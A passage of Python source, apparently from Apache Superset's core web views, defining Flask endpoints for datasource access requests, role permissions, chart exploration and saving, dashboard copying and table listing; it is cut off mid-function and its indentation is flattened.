from superset.sqllab.sqllab_execution_context import SqlJsonExecutionContext
from superset.sqllab.utils import apply_display_max_row_configuration_if_require
from superset.sqllab.validators import CanAccessQueryValidatorImpl
from superset.superset_typing import FlaskResponse
from superset.tasks.async_queries import load_explore_json_into_cache
from superset.utils import core as utils, csv
from superset.utils.async_query_manager import AsyncQueryTokenException
from superset.utils.cache import etag_cache
from superset.utils.core import (
apply_max_row_limit,
DatasourceType,
ReservedUrlParameters,
)
from superset.utils.dates import now_as_float
from superset.utils.decorators import check_dashboard_access
from superset.views.base import (
api,
BaseSupersetView,
check_ownership,
common_bootstrap_payload,
create_table_permissions,
CsvResponse,
data_payload_response,
generate_download_headers,
get_error_msg,
handle_api_exception,
json_error_response,
json_errors_response,
json_success,
validate_sqlatable,
)
from superset.views.utils import (
_deserialize_results_payload,
bootstrap_user_data,
check_datasource_perms,
check_explore_cache_perms,
check_resource_permissions,
check_slice_perms,
get_dashboard_extra_filters,
get_datasource_info,
get_form_data,
get_viz,
is_owner,
sanitize_datasource_data,
)
from superset.viz import BaseViz
config = app.config
SQLLAB_QUERY_COST_ESTIMATE_TIMEOUT = config["SQLLAB_QUERY_COST_ESTIMATE_TIMEOUT"]
stats_logger = config["STATS_LOGGER"]
DAR = DatasourceAccessRequest
logger = logging.getLogger(__name__)
DATABASE_KEYS = [
"allow_file_upload",
"allow_ctas",
"allow_cvas",
"allow_dml",
"allow_multi_schema_metadata_fetch",
"allow_run_async",
"allows_subquery",
"backend",
"database_name",
"expose_in_sqllab",
"force_ctas_schema",
"id",
"disable_data_preview",
]
DATASOURCE_MISSING_ERR = __("The data source seems to have been deleted")
USER_MISSING_ERR = __("The user seems to have been deleted")
PARAMETER_MISSING_ERR = (
"Please check your template parameters for syntax errors and make sure "
"they match across your SQL query and Set Parameters. Then, try running "
"your query again."
)
SqlResults = Dict[str, Any]
class Superset(BaseSupersetView): # pylint: disable=too-many-public-methods
"""The base views for Superset!"""
logger = logging.getLogger(__name__)
@has_access_api
@event_logger.log_this
@expose("/datasources/")
def datasources(self) -> FlaskResponse:
return self.json_response(
sorted(
[
datasource.short_data
for datasource in security_manager.get_user_datasources()
if datasource.short_data.get("name")
],
key=lambda datasource: datasource["name"],
)
)
@has_access_api
@event_logger.log_this
@expose("/override_role_permissions/", methods=["POST"])
def override_role_permissions(self) -> FlaskResponse:
"""Updates the role with the give datasource permissions.
Permissions not in the request will be revoked. This endpoint should
be available to admins only. Expects JSON in the format:
{
'role_name': '{role_name}',
'database': [{
'datasource_type': '{table|druid}',
'name': '{database_name}',
'schema': [{
'name': '{schema_name}',
'datasources': ['{datasource name}, {datasource name}']
}]
}]
}
"""
data = request.get_json(force=True)
role_name = data["role_name"]
databases = data["database"]
db_ds_names = set()
for dbs in databases:
for schema in dbs["schema"]:
for ds_name in schema["datasources"]:
fullname = utils.get_datasource_full_name(
dbs["name"], ds_name, schema=schema["name"]
)
db_ds_names.add(fullname)
existing_datasources = SqlaTable.get_all_datasources(db.session)
datasources = [d for d in existing_datasources if d.full_name in db_ds_names]
role = security_manager.find_role(role_name)
# remove all permissions
role.permissions = []
# grant permissions to the list of datasources
granted_perms = []
for datasource in datasources:
view_menu_perm = security_manager.find_permission_view_menu(
view_menu_name=datasource.perm, permission_name="datasource_access"
)
# prevent creating empty permissions
if view_menu_perm and view_menu_perm.view_menu:
role.permissions.append(view_menu_perm)
granted_perms.append(view_menu_perm.view_menu.name)
db.session.commit()
return self.json_response(
{"granted": granted_perms, "requested": list(db_ds_names)}, status=201
)
@has_access
@event_logger.log_this
@expose("/request_access/")
def request_access(self) -> FlaskResponse:
datasources = set()
dashboard_id = request.args.get("dashboard_id")
if dashboard_id:
dash = db.session.query(Dashboard).filter_by(id=int(dashboard_id)).one()
datasources |= dash.datasources
datasource_id = request.args.get("datasource_id")
datasource_type = request.args.get("datasource_type")
if datasource_id and datasource_type:
ds_class = DatasourceDAO.sources.get(datasource_type)
datasource = (
db.session.query(ds_class).filter_by(id=int(datasource_id)).one()
)
datasources.add(datasource)
has_access_ = all(
(
datasource and security_manager.can_access_datasource(datasource)
for datasource in datasources
)
)
if has_access_:
return redirect("/superset/dashboard/{}".format(dashboard_id))
if request.args.get("action") == "go":
for datasource in datasources:
access_request = DAR(
datasource_id=datasource.id, datasource_type=datasource.type
)
db.session.add(access_request)
db.session.commit()
flash(__("Access was requested"), "info")
return redirect("/")
return self.render_template(
"superset/request_access.html",
datasources=datasources,
datasource_names=", ".join([o.name for o in datasources]),
)
@has_access
@event_logger.log_this
@expose("/approve")
def approve(self) -> FlaskResponse: # pylint: disable=too-many-locals,no-self-use
def clean_fulfilled_requests(session: Session) -> None:
for dar in session.query(DAR).all():
datasource = DatasourceDAO.get_datasource(
session, DatasourceType(dar.datasource_type), dar.datasource_id
)
if not datasource or security_manager.can_access_datasource(datasource):
# Dataset does not exist anymore
session.delete(dar)
session.commit()
datasource_type = request.args["datasource_type"]
datasource_id = request.args["datasource_id"]
created_by_username = request.args.get("created_by")
role_to_grant = request.args.get("role_to_grant")
role_to_extend = request.args.get("role_to_extend")
session = db.session
datasource = DatasourceDAO.get_datasource(
session, DatasourceType(datasource_type), int(datasource_id)
)
if not datasource:
flash(DATASOURCE_MISSING_ERR, "alert")
return json_error_response(DATASOURCE_MISSING_ERR)
requested_by = security_manager.find_user(username=created_by_username)
if not requested_by:
flash(USER_MISSING_ERR, "alert")
return json_error_response(USER_MISSING_ERR)
requests = (
session.query(DAR)
.filter( # pylint: disable=comparison-with-callable
DAR.datasource_id == datasource_id,
DAR.datasource_type == datasource_type,
DAR.created_by_fk == requested_by.id,
)
.all()
)
if not requests:
err = __("The access requests seem to have been deleted")
flash(err, "alert")
return json_error_response(err)
# check if you can approve
if security_manager.can_access_all_datasources() or check_ownership(
datasource, raise_if_false=False
):
# can by done by admin only
if role_to_grant:
role = security_manager.find_role(role_to_grant)
requested_by.roles.append(role)
msg = __(
"%(user)s was granted the role %(role)s that gives access "
"to the %(datasource)s",
user=requested_by.username,
role=role_to_grant,
datasource=datasource.full_name,
)
utils.notify_user_about_perm_udate(
g.user,
requested_by,
role,
datasource,
"email/role_granted.txt",
app.config,
)
flash(msg, "info")
if role_to_extend:
perm_view = security_manager.find_permission_view_menu(
"email/datasource_access", datasource.perm
)
role = security_manager.find_role(role_to_extend)
security_manager.add_permission_role(role, perm_view)
msg = __(
"Role %(r)s was extended to provide the access to "
"the datasource %(ds)s",
r=role_to_extend,
ds=datasource.full_name,
)
utils.notify_user_about_perm_udate(
g.user,
requested_by,
role,
datasource,
"email/role_extended.txt",
app.config,
)
flash(msg, "info")
clean_fulfilled_requests(session)
else:
flash(__("You have no permission to approve this request"), "danger")
return redirect("/accessrequestsmodelview/list/")
for request_ in requests:
session.delete(request_)
session.commit()
return redirect("/accessrequestsmodelview/list/")
@has_access
@event_logger.log_this
@expose("/slice/<int:slice_id>/")
def slice(self, slice_id: int) -> FlaskResponse: # pylint: disable=no-self-use
_, slc = get_form_data(slice_id, use_slice_data=True)
if not slc:
abort(404)
endpoint = "/superset/explore/?form_data={}".format(
parse.quote(json.dumps({"slice_id": slice_id}))
)
is_standalone_mode = ReservedUrlParameters.is_standalone_mode()
if is_standalone_mode:
endpoint += f"&{ReservedUrlParameters.STANDALONE}={is_standalone_mode}"
return redirect(endpoint)
def get_query_string_response(self, viz_obj: BaseViz) -> FlaskResponse:
query = None
try:
query_obj = viz_obj.query_obj()
if query_obj:
query = viz_obj.datasource.get_query_str(query_obj)
except Exception as ex: # pylint: disable=broad-except
err_msg = utils.error_msg_from_exception(ex)
logger.exception(err_msg)
return json_error_response(err_msg)
if not query:
query = "No query."
return self.json_response(
{"query": query, "language": viz_obj.datasource.query_language}
)
def get_raw_results(self, viz_obj: BaseViz) -> FlaskResponse:
payload = viz_obj.get_df_payload()
if viz_obj.has_error(payload):
return json_error_response(payload=payload, status=400)
return self.json_response(
{
"data": payload["df"].to_dict("records"),
"colnames": payload.get("colnames"),
"coltypes": payload.get("coltypes"),
},
)
def get_samples(self, viz_obj: BaseViz) -> FlaskResponse:
return self.json_response(viz_obj.get_samples())
@staticmethod
def send_data_payload_response(viz_obj: BaseViz, payload: Any) -> FlaskResponse:
return data_payload_response(*viz_obj.payload_json_and_has_error(payload))
def generate_json(
self, viz_obj: BaseViz, response_type: Optional[str] = None
) -> FlaskResponse:
if response_type == ChartDataResultFormat.CSV:
return CsvResponse(
viz_obj.get_csv(), headers=generate_download_headers("csv")
)
if response_type == ChartDataResultType.QUERY:
return self.get_query_string_response(viz_obj)
if response_type == ChartDataResultType.RESULTS:
return self.get_raw_results(viz_obj)
if response_type == ChartDataResultType.SAMPLES:
return self.get_samples(viz_obj)
payload = viz_obj.get_payload()
return self.send_data_payload_response(viz_obj, payload)
@event_logger.log_this
@api
@has_access_api
@expose("/slice_json/<int:slice_id>")
@etag_cache()
@check_resource_permissions(check_slice_perms)
def slice_json(self, slice_id: int) -> FlaskResponse:
form_data, slc = get_form_data(slice_id, use_slice_data=True)
if not slc:
return json_error_response("The slice does not exist")
if not slc.datasource:
return json_error_response("The slice's datasource does not exist")
try:
viz_obj = get_viz(
datasource_type=slc.datasource.type,
datasource_id=slc.datasource.id,
form_data=form_data,
force=False,
)
return self.generate_json(viz_obj)
except SupersetException as ex:
return json_error_response(utils.error_msg_from_exception(ex))
@api
@has_access_api
@event_logger.log_this
@expose("/annotation_json/<int:layer_id>")
def annotation_json( # pylint: disable=no-self-use
self, layer_id: int
) -> FlaskResponse:
form_data = get_form_data()[0]
force = utils.parse_boolean_string(request.args.get("force"))
form_data["layer_id"] = layer_id
form_data["filters"] = [{"col": "layer_id", "op": "==", "val": layer_id}]
# Set all_columns to ensure the TableViz returns the necessary columns to the
# frontend.
form_data["all_columns"] = [
"created_on",
"changed_on",
"id",
"start_dttm",
"end_dttm",
"layer_id",
"short_descr",
"long_descr",
"json_metadata",
"created_by_fk",
"changed_by_fk",
]
datasource = AnnotationDatasource()
viz_obj = viz.viz_types["table"](datasource, form_data=form_data, force=force)
payload = viz_obj.get_payload()
return data_payload_response(*viz_obj.payload_json_and_has_error(payload))
@event_logger.log_this
@api
@has_access_api
@handle_api_exception
@permission_name("explore_json")
@expose("/explore_json/data/<cache_key>", methods=["GET"])
@check_resource_permissions(check_explore_cache_perms)
def explore_json_data(self, cache_key: str) -> FlaskResponse:
"""Serves cached result data for async explore_json calls
`self.generate_json` receives this input and returns different
payloads based on the request args in the first block
TODO: form_data should not be loaded twice from cache
(also loaded in `check_explore_cache_perms`)
"""
try:
cached = cache_manager.cache.get(cache_key)
if not cached:
raise CacheLoadError("Cached data not found")
form_data = cached.get("form_data")
response_type = cached.get("response_type")
datasource_id, datasource_type = get_datasource_info(None, None, form_data)
viz_obj = get_viz(
datasource_type=cast(str, datasource_type),
datasource_id=datasource_id,
form_data=form_data,
force_cached=True,
)
return self.generate_json(viz_obj, response_type)
except SupersetException as ex:
return json_error_response(utils.error_msg_from_exception(ex), 400)
EXPLORE_JSON_METHODS = ["POST"]
if not is_feature_enabled("ENABLE_EXPLORE_JSON_CSRF_PROTECTION"):
EXPLORE_JSON_METHODS.append("GET")
@api
@has_access_api
@handle_api_exception
@event_logger.log_this
@expose(
"/explore_json/<datasource_type>/<int:datasource_id>/",
methods=EXPLORE_JSON_METHODS,
)
@expose("/explore_json/", methods=EXPLORE_JSON_METHODS)
@etag_cache()
@check_resource_permissions(check_datasource_perms)
def explore_json(
self, datasource_type: Optional[str] = None, datasource_id: Optional[int] = None
) -> FlaskResponse:
"""Serves all request that GET or POST form_data
This endpoint evolved to be the entry point of many different
requests that GETs or POSTs a form_data.
`self.generate_json` receives this input and returns different
payloads based on the request args in the first block
TODO: break into one endpoint for each return shape"""
response_type = ChartDataResultFormat.JSON.value
responses: List[Union[ChartDataResultFormat, ChartDataResultType]] = list(
ChartDataResultFormat
)
responses.extend(list(ChartDataResultType))
for response_option in responses:
if request.args.get(response_option) == "true":
response_type = response_option
break
# Verify user has permission to export CSV file
if (
response_type == ChartDataResultFormat.CSV
and not security_manager.can_access("can_csv", "Superset")
):
return json_error_response(
_("You don't have the rights to ") + _("download as csv"),
status=403,
)
form_data = get_form_data()[0]
try:
datasource_id, datasource_type = get_datasource_info(
datasource_id, datasource_type, form_data
)
force = request.args.get("force") == "true"
# TODO: support CSV, SQL query and other non-JSON types
if (
is_feature_enabled("GLOBAL_ASYNC_QUERIES")
and response_type == ChartDataResultFormat.JSON
):
# First, look for the chart query results in the cache.
try:
viz_obj = get_viz(
datasource_type=cast(str, datasource_type),
datasource_id=datasource_id,
form_data=form_data,
force_cached=True,
force=force,
)
payload = viz_obj.get_payload()
# If the chart query has already been cached, return it immediately.
if payload is not None:
return self.send_data_payload_response(viz_obj, payload)
except CacheLoadError:
pass
# Otherwise, kick off a background job to run the chart query.
# Clients will either poll or be notified of query completion,
# at which point they will call the /explore_json/data/<cache_key>
# endpoint to retrieve the results.
try:
async_channel_id = async_query_manager.parse_jwt_from_request(
request
)["channel"]
job_metadata = async_query_manager.init_job(
async_channel_id, g.user.get_id()
)
load_explore_json_into_cache.delay(
job_metadata, form_data, response_type, force
)
except AsyncQueryTokenException:
return json_error_response("Not authorized", 401)
return json_success(json.dumps(job_metadata), status=202)
viz_obj = get_viz(
datasource_type=cast(str, datasource_type),
datasource_id=datasource_id,
form_data=form_data,
force=force,
)
return self.generate_json(viz_obj, response_type)
except SupersetException as ex:
return json_error_response(utils.error_msg_from_exception(ex), 400)
@has_access
@event_logger.log_this
@expose("/import_dashboards/", methods=["GET", "POST"])
def import_dashboards(self) -> FlaskResponse:
"""Overrides the dashboards using json instances from the file."""
import_file = request.files.get("file")
if request.method == "POST" and import_file:
success = False
database_id = request.form.get("db_id")
try:
ImportDashboardsCommand(
{import_file.filename: import_file.read()}, database_id
).run()
success = True
except DatabaseNotFound as ex:
logger.exception(ex)
flash(
_(
"Cannot import dashboard: %(db_error)s.\n"
"Make sure to create the database before "
"importing the dashboard.",
db_error=ex,
),
"danger",
)
except Exception as ex: # pylint: disable=broad-except
logger.exception(ex)
flash(
_(
"An unknown error occurred. "
"Please contact your Superset administrator"
),
"danger",
)
if success:
flash("Dashboard(s) have been imported", "success")
return redirect("/dashboard/list/")
databases = db.session.query(Database).all()
return self.render_template(
"superset/import_dashboards.html", databases=databases
)
@has_access
@event_logger.log_this
@expose("/explore/<datasource_type>/<int:datasource_id>/", methods=["GET", "POST"])
@expose("/explore/", methods=["GET", "POST"])
@expose("/explore/p/<key>/", methods=["GET"])
# pylint: disable=too-many-locals,too-many-branches,too-many-statements
def explore(
self,
datasource_type: Optional[str] = None,
datasource_id: Optional[int] = None,
key: Optional[str] = None,
) -> FlaskResponse:
initial_form_data = {}
form_data_key = request.args.get("form_data_key")
if key is not None:
command = GetExplorePermalinkCommand(g.user, key)
try:
permalink_value = command.run()
if permalink_value:
state = permalink_value["state"]
initial_form_data = state["formData"]
url_params = state.get("urlParams")
if url_params:
initial_form_data["url_params"] = dict(url_params)
else:
return json_error_response(
_("Error: permalink state not found"), status=404
)
except (ChartNotFoundError, ExplorePermalinkGetFailedError) as ex:
flash(__("Error: %(msg)s", msg=ex.message), "danger")
return redirect("/chart/list/")
elif form_data_key:
parameters = CommandParameters(actor=g.user, key=form_data_key)
value = GetFormDataCommand(parameters).run()
initial_form_data = json.loads(value) if value else {}
if not initial_form_data:
slice_id = request.args.get("slice_id")
dataset_id = request.args.get("dataset_id")
if slice_id:
initial_form_data["slice_id"] = slice_id
if form_data_key:
flash(
_("Form data not found in cache, reverting to chart metadata.")
)
elif dataset_id:
initial_form_data["datasource"] = f"{dataset_id}__table"
if form_data_key:
flash(
_(
"Form data not found in cache, reverting to dataset metadata."
)
)
form_data, slc = get_form_data(
use_slice_data=True, initial_form_data=initial_form_data
)
query_context = request.form.get("query_context")
try:
datasource_id, datasource_type = get_datasource_info(
datasource_id, datasource_type, form_data
)
except SupersetException:
datasource_id = None
# fallback unkonw datasource to table type
datasource_type = SqlaTable.type
datasource: Optional[BaseDatasource] = None
if datasource_id is not None:
try:
datasource = DatasourceDAO.get_datasource(
db.session,
DatasourceType(cast(str, datasource_type)),
datasource_id,
)
except DatasetNotFoundError:
pass
datasource_name = datasource.name if datasource else _("[Missing Dataset]")
if datasource:
if config["ENABLE_ACCESS_REQUEST"] and (
not security_manager.can_access_datasource(datasource)
):
flash(
__(security_manager.get_datasource_access_error_msg(datasource)),
"danger",
)
return redirect(
"superset/request_access/?"
f"datasource_type={datasource_type}&"
f"datasource_id={datasource_id}&"
)
viz_type = form_data.get("viz_type")
if not viz_type and datasource and datasource.default_endpoint:
return redirect(datasource.default_endpoint)
# slc perms
slice_add_perm = security_manager.can_access("can_write", "Chart")
slice_overwrite_perm = is_owner(slc, g.user) if slc else False
slice_download_perm = security_manager.can_access("can_csv", "Superset")
form_data["datasource"] = str(datasource_id) + "__" + cast(str, datasource_type)
# On explore, merge legacy and extra filters into the form data
utils.convert_legacy_filters_into_adhoc(form_data)
utils.merge_extra_filters(form_data)
# merge request url params
if request.method == "GET":
utils.merge_request_params(form_data, request.args)
# handle save or overwrite
action = request.args.get("action")
if action == "overwrite" and not slice_overwrite_perm:
return json_error_response(
_("You don't have the rights to ") + _("alter this ") + _("chart"),
status=403,
)
if action == "saveas" and not slice_add_perm:
return json_error_response(
_("You don't have the rights to ") + _("create a ") + _("chart"),
status=403,
)
if action in ("saveas", "overwrite") and datasource:
return self.save_or_overwrite_slice(
slc,
slice_add_perm,
slice_overwrite_perm,
slice_download_perm,
datasource.id,
datasource.type,
datasource.name,
query_context,
)
standalone_mode = ReservedUrlParameters.is_standalone_mode()
force = request.args.get("force") in {"force", "1", "true"}
dummy_datasource_data: Dict[str, Any] = {
"type": datasource_type,
"name": datasource_name,
"columns": [],
"metrics": [],
"database": {"id": 0, "backend": ""},
}
try:
datasource_data = datasource.data if datasource else dummy_datasource_data
except (SupersetException, SQLAlchemyError):
datasource_data = dummy_datasource_data
if datasource:
datasource_data["owners"] = datasource.owners_data
if isinstance(datasource, Query):
datasource_data["columns"] = datasource.columns
bootstrap_data = {
"can_add": slice_add_perm,
"can_download": slice_download_perm,
"datasource": sanitize_datasource_data(datasource_data),
"form_data": form_data,
"datasource_id": datasource_id,
"datasource_type": datasource_type,
"slice": slc.data if slc else None,
"standalone": standalone_mode,
"force": force,
"user": bootstrap_user_data(g.user, include_perms=True),
"forced_height": request.args.get("height"),
"common": common_bootstrap_payload(),
}
if slc:
title = slc.slice_name
elif datasource:
table_name = (
datasource.table_name
if datasource_type == "table"
else datasource.datasource_name
)
title = _("Explore - %(table)s", table=table_name)
else:
title = _("Explore")
return self.render_template(
"superset/basic.html",
bootstrap_data=json.dumps(
bootstrap_data, default=utils.pessimistic_json_iso_dttm_ser
),
entry="explore",
title=title.__str__(),
standalone_mode=standalone_mode,
)
@api
@handle_api_exception
@has_access_api
@event_logger.log_this
@expose("/filter/<datasource_type>/<int:datasource_id>/<column>/")
def filter( # pylint: disable=no-self-use
self, datasource_type: str, datasource_id: int, column: str
) -> FlaskResponse:
"""
Endpoint to retrieve values for specified column.
:param datasource_type: Type of datasource e.g. table
:param datasource_id: Datasource id
:param column: Column name to retrieve values for
:returns: The Flask response
:raises SupersetSecurityException: If the user cannot access the resource
"""
# TODO: Cache endpoint by user, datasource and column
datasource = DatasourceDAO.get_datasource(
db.session, DatasourceType(datasource_type), datasource_id
)
if not datasource:
return json_error_response(DATASOURCE_MISSING_ERR)
datasource.raise_for_access()
row_limit = apply_max_row_limit(config["FILTER_SELECT_ROW_LIMIT"])
payload = json.dumps(
datasource.values_for_column(column_name=column, limit=row_limit),
default=utils.json_int_dttm_ser,
ignore_nan=True,
)
return json_success(payload)
@staticmethod
def remove_extra_filters(filters: List[Dict[str, Any]]) -> List[Dict[str, Any]]:
"""Extra filters are ones inherited from the dashboard's temporary context
Those should not be saved when saving the chart"""
return [f for f in filters if not f.get("isExtra")]
def save_or_overwrite_slice(
# pylint: disable=too-many-arguments,too-many-locals
self,
slc: Optional[Slice],
slice_add_perm: bool,
slice_overwrite_perm: bool,
slice_download_perm: bool,
datasource_id: int,
datasource_type: str,
datasource_name: str,
query_context: Optional[str] = None,
) -> FlaskResponse:
"""Save or overwrite a slice"""
slice_name = request.args.get("slice_name")
action = request.args.get("action")
form_data = get_form_data()[0]
if action == "saveas":
if "slice_id" in form_data:
form_data.pop("slice_id") # don't save old slice_id
slc = Slice(owners=[g.user] if g.user else [])
form_data["adhoc_filters"] = self.remove_extra_filters(
form_data.get("adhoc_filters") or []
)
assert slc
slc.params = json.dumps(form_data, indent=2, sort_keys=True)
slc.datasource_name = datasource_name
slc.viz_type = form_data["viz_type"]
slc.datasource_type = datasource_type
slc.datasource_id = datasource_id
slc.last_saved_by = g.user
slc.last_saved_at = datetime.now()
slc.slice_name = slice_name
slc.query_context = query_context
if action == "saveas" and slice_add_perm:
ChartDAO.save(slc)
msg = _("Chart [{}] has been saved").format(slc.slice_name)
flash(msg, "success")
elif action == "overwrite" and slice_overwrite_perm:
ChartDAO.overwrite(slc)
msg = _("Chart [{}] has been overwritten").format(slc.slice_name)
flash(msg, "success")
# Adding slice to a dashboard if requested
dash: Optional[Dashboard] = None
save_to_dashboard_id = request.args.get("save_to_dashboard_id")
new_dashboard_name = request.args.get("new_dashboard_name")
if save_to_dashboard_id:
# Adding the chart to an existing dashboard
dash = cast(
Dashboard,
db.session.query(Dashboard)
.filter_by(id=int(save_to_dashboard_id))
.one(),
)
# check edit dashboard permissions
dash_overwrite_perm = check_ownership(dash, raise_if_false=False)
if not dash_overwrite_perm:
return json_error_response(
_("You don't have the rights to ")
+ _("alter this ")
+ _("dashboard"),
status=403,
)
flash(
_("Chart [{}] was added to dashboard [{}]").format(
slc.slice_name, dash.dashboard_title
),
"success",
)
elif new_dashboard_name:
# Creating and adding to a new dashboard
# check create dashboard permissions
dash_add_perm = security_manager.can_access("can_write", "Dashboard")
if not dash_add_perm:
return json_error_response(
_("You don't have the rights to ")
+ _("create a ")
+ _("dashboard"),
status=403,
)
dash = Dashboard(
dashboard_title=request.args.get("new_dashboard_name"),
owners=[g.user] if g.user else [],
)
flash(
_(
"Dashboard [{}] just got created and chart [{}] was added " "to it"
).format(dash.dashboard_title, slc.slice_name),
"success",
)
if dash and slc not in dash.slices:
dash.slices.append(slc)
db.session.commit()
response = {
"can_add": slice_add_perm,
"can_download": slice_download_perm,
"form_data": slc.form_data,
"slice": slc.data,
"dashboard_url": dash.url if dash else None,
"dashboard_id": dash.id if dash else None,
}
if dash and request.args.get("goto_dash") == "true":
response.update({"dashboard": dash.url})
return json_success(json.dumps(response))
@api
@has_access_api
@event_logger.log_this
@expose("/tables/<int:db_id>/<schema>/<substr>/")
@expose("/tables/<int:db_id>/<schema>/<substr>/<force_refresh>/")
@expose("/tables/<int:db_id>/<schema>/<substr>/<force_refresh>/<exact_match>")
def tables( # pylint: disable=too-many-locals,no-self-use,too-many-arguments
self,
db_id: int,
schema: str,
substr: str,
force_refresh: str = "false",
exact_match: str = "false",
) -> FlaskResponse:
"""Endpoint to fetch the list of tables for given database"""
# Guarantees database filtering by security access
query = db.session.query(Database)
query = DatabaseFilter("id", SQLAInterface(Database, db.session)).apply(
query, None
)
database = query.filter_by(id=db_id).one_or_none()
if not database:
return json_error_response("Not found", 404)
force_refresh_parsed = force_refresh.lower() == "true"
exact_match_parsed = exact_match.lower() == "true"
schema_parsed = utils.parse_js_uri_path_item(schema, eval_undefined=True)
substr_parsed = utils.parse_js_uri_path_item(substr, eval_undefined=True)
if schema_parsed:
tables = [
utils.DatasourceName(*datasource_name)
for datasource_name in database.get_all_table_names_in_schema(
schema=schema_parsed,
force=force_refresh_parsed,
cache=database.table_cache_enabled,
cache_timeout=database.table_cache_timeout,
)
] or []
views = [
utils.DatasourceName(*datasource_name)
for datasource_name in database.get_all_view_names_in_schema(
schema=schema_parsed,
force=force_refresh_parsed,
cache=database.table_cache_enabled,
cache_timeout=database.table_cache_timeout,
)
] or []
else:
tables = [
utils.DatasourceName(*datasource_name)
for datasource_name in database.get_all_table_names_in_database(
cache=True, force=False, cache_timeout=24 * 60 * 60
)
]
views = [
utils.DatasourceName(*datasource_name)
for datasource_name in database.get_all_view_names_in_database(
cache=True, force=False, cache_timeout=24 * 60 * 60
)
]
tables = security_manager.get_datasources_accessible_by_user(
database, tables, schema_parsed
)
views = security_manager.get_datasources_accessible_by_user(
database, views, schema_parsed
)
def get_datasource_label(ds_name: utils.DatasourceName) -> str:
return (
ds_name.table if schema_parsed else f"{ds_name.schema}.{ds_name.table}"
)
def is_match(src: str, target: utils.DatasourceName) -> bool:
target_label = get_datasource_label(target)
if exact_match_parsed:
return src == target_label
return src in target_label
if substr_parsed:
tables = [tn for tn in tables if is_match(substr_parsed, tn)]
views = [vn for vn in views if is_match(substr_parsed, vn)]
if not schema_parsed and database.default_schemas:
user_schemas = (
[g.user.email.split("@")[0]] if hasattr(g.user, "email") else []
)
valid_schemas = set(database.default_schemas + user_schemas)
tables = [tn for tn in tables if tn.schema in valid_schemas]
views = [vn for vn in views if vn.schema in valid_schemas]
max_items = config["MAX_TABLE_NAMES"] or len(tables)
total_items = len(tables) + len(views)
max_tables = len(tables)
max_views = len(views)
if total_items and substr_parsed:
max_tables = max_items * len(tables) // total_items
max_views = max_items * len(views) // total_items
dataset_tables = {table.name: table for table in database.tables}
table_options = [
{
"value": tn.table,
"schema": tn.schema,
"label": get_datasource_label(tn),
"title": get_datasource_label(tn),
"type": "table",
"extra": dataset_tables[f"{tn.schema}.{tn.table}"].extra_dict
if (f"{tn.schema}.{tn.table}" in dataset_tables)
else None,
}
for tn in tables[:max_tables]
]
table_options.extend(
[
{
"value": vn.table,
"schema": vn.schema,
"label": get_datasource_label(vn),
"title": get_datasource_label(vn),
"type": "view",
}
for vn in views[:max_views]
]
)
table_options.sort(key=lambda value: value["label"])
payload = {"tableLength": len(tables) + len(views), "options": table_options}
return json_success(json.dumps(payload))
@api
@has_access_api
@event_logger.log_this
@expose("/copy_dash/<int:dashboard_id>/", methods=["GET", "POST"])
def copy_dash( # pylint: disable=no-self-use
self, dashboard_id: int
) -> FlaskResponse:
"""Copy dashboard"""
session = db.session()
data = json.loads(request.form["data"])
# client-side send back last_modified_time which was set when
# the dashboard was open. it was use to avoid mid-air collision.
# remove it to avoid confusion.
data.pop("last_modified_time", None)
dash = Dashboard()
original_dash = session.query(Dashboard).get(dashboard_id)
dash.owners = [g.user] if g.user else []
dash.dashboard_title = data["dashboard_title"]
old_to_new_slice_ids: Dict[int, int] = {}
if data["duplicate_slices"]:
# Duplicating slices as well, mapping old ids to new ones
for slc in original_dash.slices:
new_slice = slc.clone()
new_slice.owners = [g.user] if g.user else []
session.add(new_slice)
session.flush()
new_slice.dashboards.append(dash)
old_to_new_slice_ids[slc.id] = new_slice.id
# update chartId of layout entities
for value in data["positions"].values():
if isinstance(value, dict) and value.get("meta", {}).get("chartId"):
old_id = value["meta"]["chartId"]
new_id = old_to_new_slice_ids.get(old_id)
value["meta"]["chartId"] = new_id
else:
dash.slices = original_dash.slices
dash.params = original_dash.params
DashboardDAO.set_dash_metadata(dash, data, old_to_new_slice_ids)
session.add(dash)
session.commit()
dash_json = json.dumps(dash.data)
session.close()
return json_success(dash_json)
@api
@has_access_api
@event_logger.log_this
@expose("/save_dash/<int:dashboard_id>/", methods=["GET", "POST"])
def save_dash( # pylint: disable=no-self-use
self, dashboard_id: int
) -> FlaskResponse:
"""Save a dashboard's metadata"""
session = db.session()
dash = session.query(Dashboard).get(dashboard_id)
check_ownership(dash, raise_if_false=True)
data = json.loads(request.form["data"])
# client-side send back last_modified_time which was set when
# the dashboard was open. it was use to avoid mid-air collision.
remote_last_modified_time = data.get("last_modified_time")
current_last_modified_time = dash.changed_on.replace(microsecond=0).timestamp()
if (
remote_last_modified_time
and remote_last_modified_time < current_last_modified_time
):
return json_error_response(
__(
"This dashboard was changed recently. "
"Please reload dashboard to get latest version."
),
412,
)
# remove to avoid confusion.
data.pop("last_modified_time", None)
DashboardDAO.set_dash_metadata(dash, data)
session.merge(dash)
session.commit()
# get updated changed_on
dash = session.query(Dashboard).get(dashboard_id)
last_modified_time = dash.changed_on.replace(microsecond=0).timestamp()
session.close()
return json_success(
json.dumps({"status": "SUCCESS", "last_modified_time": last_modified_time})
)
@api
@has_access_api
@event_logger.log_this
@expose("/add_slices/<int:dashboard_id>/", methods=["POST"])
def add_slices( # pylint: disable=no-self-use
self, dashboard_id: int
) -> FlaskResponse:
"""Add and save slices to a dashboard"""
data = json.loads(request.form["data"])
session = db.session()
dash = session.query(Dashboard).get(dashboard_id)
check_ownership(dash, raise_if_false=True)
new_slices = session.query(Slice).filter(Slice.id.in_(data["slice_ids"]))
dash.slices += new_slices
session.merge(dash)
session.commit()
session.close()
return "SLICES ADDED"
@api
@has_access_api
@event_logger.log_this
@expose("/testconn", methods=["POST", "GET"])
def testconn(self) -> FlaskResponse:
"""Tests a sqla connection"""
logger.warning(
"%s.testconn "
"This API endpoint is deprecated and will be removed in version 3.0.0",
self.__class__.__name__,
)
db_name = request.json.get("name")
uri = request.json.get("uri")
try:
if app.config["PREVENT_UNSAFE_DB_CONNECTIONS"]:
check_sqlalchemy_uri(make_url_safe(uri))
# if the database already exists in the database, only its safe
# (password-masked) URI would be shown in the UI and would be passed in the
# form data so if the database already exists and the form was submitted
# with the safe URI, we assume we should retrieve the decrypted URI to test
# the connection.
if db_name:
existing_database = (
db.session.query(Database)
.filter_by(database_name=db_name)
.one_or_none()
)
if existing_database and uri == existing_database.safe_sqlalchemy_uri():
uri = existing_database.sqlalchemy_uri_decrypted
# This is the database instance that will be tested. Note the extra fields
